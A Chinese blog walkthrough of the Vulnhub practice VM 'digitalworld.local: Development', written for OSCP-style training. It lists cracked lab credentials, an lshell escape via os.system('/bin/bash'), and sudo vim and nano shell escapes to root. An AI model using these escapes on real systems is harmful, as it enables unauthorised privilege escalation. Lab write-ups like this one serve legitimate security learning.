Vulnhub:Digitalworld.local (Development)靶机

已于 2023-06-07 23:32:53 修改
阅读量503 收藏 2
点赞数 1
文章标签: 安全 网络安全 web安全
于 2023-04-09 19:08:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/130045971
版权

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

查看网站首页源码

访问development目录,提示存在一个流量包

查看流量包发现另一个网站路径:/developmentsecretpage/directortestpagev1.php

访问该路径后退出登录,再重新登录,用户名和密码随便填写,之后页面提示报错

根据报错搜索关键字

在exp中提示通过访问slog_users.txt获取敏感信息

md5解密

intern | 12345678900987654321
patrick | P@ssw0rd25
qiu | qiu

使用intern用户登录目标

lshell绕过

echo os.system('/bin/bash')

提权

使用之前得到的密码,切换到patrick用户查看sudo权限

vim提权

提权方法:vim | GTFOBins

sudo -u root vim -c ':!/bin/bash'

nano提权

提权方法:nano | GTFOBins

sudo -u root nano
^R^X
reset; sh 1>&0 2>&0

运行nano后,键盘ctrl+r

ctrl+x

输入命令:reset; sh 1>&0 2>&0,后回车

ctostm
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
development-improved场渗透
qq_20032803的博客
02-05 772
1.扫描主机 root@kali:~# nmap --script vuln 192.168.100.131 Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-05 01:08 EST Stats: 0:00:26 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Vulnhub靶机DIGITALWORLD.LOCAL_ DEVELOPMENT
LainWith的博客
01-12 614
(此系列共9台)发布日期:2018 年 12 月 28 日难度:中级运行环境:Virtualbox运行失败,VMware运行成功目标:取得 root 权限备注:OSCP类型靶机靶机容易崩溃主机发现端口扫描+漏洞扫描错误信息泄露破解hashlshell绕过sudo提权。
OSCP练习:vulhub靶机DIGITALWORLD.LOCAL: DEVELOPMENT
weixin_47311099的博客
11-08 356
OSCP练习DIGITALWORLD.LOCAL: DEVELOPMENT
靶机渗透练习54-digitalworld.local:DEVELOPMENT
hirak0的博客
04-19 2705
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-development,280/ Description This machine reminds us of a DEVELOPMENT environment: misconfigurations rule the roost. This is designed for OSCP practice, and the original version of the machine wa
Vulnhub靶机 development-improved
菜浪马废的博客
05-03 410
信息收集 patrick可能是一个用户名 html_pages 貌似不能dirb扫描 老是断开 找到一个文件 随便输入账号 报错了
场:digitalworld.local: VENGEANCE
03-30
没有截图,但是有用的东西,全部都写上了 。一步一步来就能得到root。每一步都有描述,都有讲解。其中没有的部分,就没有卸载wp中,也不用操作,少走弯路。
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub篇Tomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
Vulnhub篇potato.zip
01-12
Vulnhub篇potato靶机靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的过程文档,供大家参考学习
Vulnix.7z靶机
04-25
一个vulnhub上的靶机,因为网络原因,下载的特别慢,我下载好,上传上来,供大家学习。如果大家有更好的靶机,请私我。
LINUX提权入门手册
qq_52988816的博客
02-12 1284
简单介绍一下LINUX提权的大体结构和知识点
Noob 场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-22 1443
Noob场渗透记录攻略向
vulnhub——Noob:1靶机
Re1_zf的博客
11-27 1400
本次靶机比较简单,没有什么很绕的思路 主要就是工具利用——steghide和base64解码 和一个新的提权方式——nano提权
生命在于学习——Linux提权
易水哲的博客
11-03 1608
Linux提权的学习笔记记录。
VulnHub-digitalworld.local: DEVELOPMENT渗透学习
我是小小白的博客
07-16 359
前言 靶机地址:https://download.vulnhub.com/digitalworld/devt-improved.7z 靶机难度:中级(CTF) 靶机发布日期:2018 年 12 月 28 日 靶机描述:这台机器让我们想起了一个开发环境:错误配置占据了主导地位。这是专为OSCP练习而设计的,机器的原始版本用于CTF。它现在复活了,并且比原来的更加邪恶。 如果你必须有关于这台机器的提示(即使他们可能不会对你有很大帮助,除非你在你的机器上扎根!):开发是(#1):与生产不同,(#2):一
Digitalworld.local (Development)--VulnHub靶机学习记录
weixin_45509443的博客
07-24 610
1.端口扫描 2.登录8080看下,根据说明有隐藏页面,然而nikto dirb等都无法目录扫描,应该也是像页面提示说的一样被入侵检测系统拦截了,那怎么找目录呢,这就有点脑洞了,原来隐藏目录就是html_pages 进入隐藏目录,接下来就是一顿翻目录了 最后在/development.html目录,查看源码发现提示,进入秘密页面 /developmentsecretpage 发现登录页面 ,无论输入什么都是报错,爆破注入什么的别想了,都是连接超时,smb服务爆破同样结局,看来..
提权的几种方法
qq_54030686的博客
11-21 3498
提权的几种方法 本文主要介绍几种提权方法的原理以及对应工具脚本的使用 windows 主要分为 系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、窃取令牌提权、bypassuac提权,第三方软件/服务提权,WEB中间件漏洞提权等。 系统内核溢出提权(例如:巴西烤肉等) 使用systeminfo查看系统的补丁 使用未打补丁的exp进行攻击 wmic qfe get Caption,Description,HotFixID,InstalledOn 使用此条命令即可查看本机安装的补丁 也可以
一文吃透Linux提权
weixin_45727359的博客
11-07 2422
来自公众号:FreeBuf作者:dnsill0x001 linux提权描述大多数计算机系统设计为可与多个用户一起使用。特权是指允许用户执行的操作。普通特权包括查看和编辑文件或修改系统文件...
42Challenge
底层社会中的弱智
07-30 325
寻找目标主机 靶机:192.168.49.149 本机:192.168.49.129 使用nmap等工具进行端口服务探测 22端口以及80端口 Nikto Whatweb 目标主机位ubuntu主机开放80和22端口,平时的话可以22端口弱口令检测工具检测一波,靶机的话就进入80端口先看看。 可以使用ping命令进行探测,首先想到的是RCE远程命令执行。 进行| || & && ; ` 进行尝试---卒 以为是回显有问题,可以使用base64进行输
vulnhub靶机系列:
最新发布
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值